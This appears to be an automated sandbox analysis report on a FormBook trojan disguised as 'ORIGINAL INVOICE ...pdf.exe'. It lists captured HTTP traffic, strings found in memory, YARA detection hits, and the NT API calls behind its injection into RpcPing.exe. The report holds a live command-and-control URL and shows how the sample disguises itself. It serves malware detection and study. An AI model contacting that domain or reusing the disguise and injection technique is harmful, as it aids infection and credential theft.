72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlru-ru
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.resellnexa.shop
            Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.resellnexa.shop/sfpe/
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: initial sampleStatic PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0042BFF3 NtClose,3_2_0042BFF3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52B60 NtClose,LdrInitializeThunk,3_2_01A52B60
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01A52DF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01A52C70
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A535C0 NtCreateMutant,LdrInitializeThunk,3_2_01A535C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A54340 NtSetContextThread,3_2_01A54340
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A54650 NtSuspendThread,3_2_01A54650
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52BA0 NtEnumerateValueKey,3_2_01A52BA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52B80 NtQueryInformationFile,3_2_01A52B80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52BE0 NtQueryValueKey,3_2_01A52BE0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52BF0 NtAllocateVirtualMemory,3_2_01A52BF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52AB0 NtWaitForSingleObject,3_2_01A52AB0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52AF0 NtWriteFile,3_2_01A52AF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52AD0 NtReadFile,3_2_01A52AD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52DB0 NtEnumerateKey,3_2_01A52DB0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52DD0 NtDelayExecution,3_2_01A52DD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52D30 NtUnmapViewOfSection,3_2_01A52D30
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52D00 NtSetInformationFile,3_2_01A52D00
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52D10 NtMapViewOfSection,3_2_01A52D10
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52CA0 NtQueryInformationToken,3_2_01A52CA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52CF0 NtOpenProcess,3_2_01A52CF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52CC0 NtQueryVirtualMemory,3_2_01A52CC0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52C00 NtQueryInformationProcess,3_2_01A52C00
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52C60 NtCreateKey,3_2_01A52C60
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52FA0 NtQuerySection,3_2_01A52FA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52FB0 NtResumeThread,3_2_01A52FB0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52F90 NtProtectVirtualMemory,3_2_01A52F90
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52FE0 NtCreateFile,3_2_01A52FE0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52F30 NtCreateSection,3_2_01A52F30
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52F60 NtCreateProcessEx,3_2_01A52F60
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52EA0 NtAdjustPrivilegesToken,3_2_01A52EA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52E80 NtReadVirtualMemory,3_2_01A52E80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52EE0 NtQueueApcThread,3_2_01A52EE0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52E30 NtWriteVirtualMemory,3_2_01A52E30
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A53090 NtSetValueKey,3_2_01A53090
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A53010 NtOpenDirectoryObject,3_2_01A53010
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A539B0 NtGetContextThread,3_2_01A539B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A53D10 NtOpenProcessToken,3_2_01A53D10
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A53D70 NtOpenThread,3_2_01A53D70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A54340 NtSetContextThread,LdrInitializeThunk,8_2_03A54340
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A54650 NtSuspendThread,LdrInitializeThunk,8_2_03A54650
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03A52BA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03A52BE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03A52BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52B60 NtClose,LdrInitializeThunk,8_2_03A52B60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52AF0 NtWriteFile,LdrInitializeThunk,8_2_03A52AF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52AD0 NtReadFile,LdrInitializeThunk,8_2_03A52AD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52FB0 NtResumeThread,LdrInitializeThunk,8_2_03A52FB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52FE0 NtCreateFile,LdrInitializeThunk,8_2_03A52FE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52F30 NtCreateSection,LdrInitializeThunk,8_2_03A52F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03A52E80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03A52EE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03A52DF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52DD0 NtDelayExecution,LdrInitializeThunk,8_2_03A52DD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03A52D30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03A52D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03A52CA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52C60 NtCreateKey,LdrInitializeThunk,8_2_03A52C60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03A52C70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A535C0 NtCreateMutant,LdrInitializeThunk,8_2_03A535C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A539B0 NtGetContextThread,LdrInitializeThunk,8_2_03A539B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52B80 NtQueryInformationFile,8_2_03A52B80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52AB0 NtWaitForSingleObject,8_2_03A52AB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52FA0 NtQuerySection,8_2_03A52FA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52F90 NtProtectVirtualMemory,8_2_03A52F90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52F60 NtCreateProcessEx,8_2_03A52F60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52EA0 NtAdjustPrivilegesToken,8_2_03A52EA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52E30 NtWriteVirtualMemory,8_2_03A52E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52DB0 NtEnumerateKey,8_2_03A52DB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52D00 NtSetInformationFile,8_2_03A52D00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52CF0 NtOpenProcess,8_2_03A52CF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52CC0 NtQueryVirtualMemory,8_2_03A52CC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A52C00 NtQueryInformationProcess,8_2_03A52C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A53090 NtSetValueKey,8_2_03A53090
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A53010 NtOpenDirectoryObject,8_2_03A53010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A53D10 NtOpenProcessToken,8_2_03A53D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03A53D70 NtOpenThread,8_2_03A53D70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03288B30 NtReadFile,8_2_03288B30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_032889D0 NtCreateFile,8_2_032889D0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03288E20 NtAllocateVirtualMemory,8_2_03288E20
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03288C20 NtDeleteFile,8_2_03288C20
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_03288CC0 NtClose,8_2_03288CC0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_00D6D5BC0_2_00D6D5BC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E83500_2_070E8350
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E22080_2_070E2208
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E42E00_2_070E42E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E1DD00_2_070E1DD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E3A080_2_070E3A08
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 0_2_070E19980_2_070E1998
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004181633_2_00418163
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004030C03_2_004030C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004011D03_2_004011D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00401A703_2_00401A70
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040FA7A3_2_0040FA7A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004022F73_2_004022F7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_0040FA833_2_0040FA83
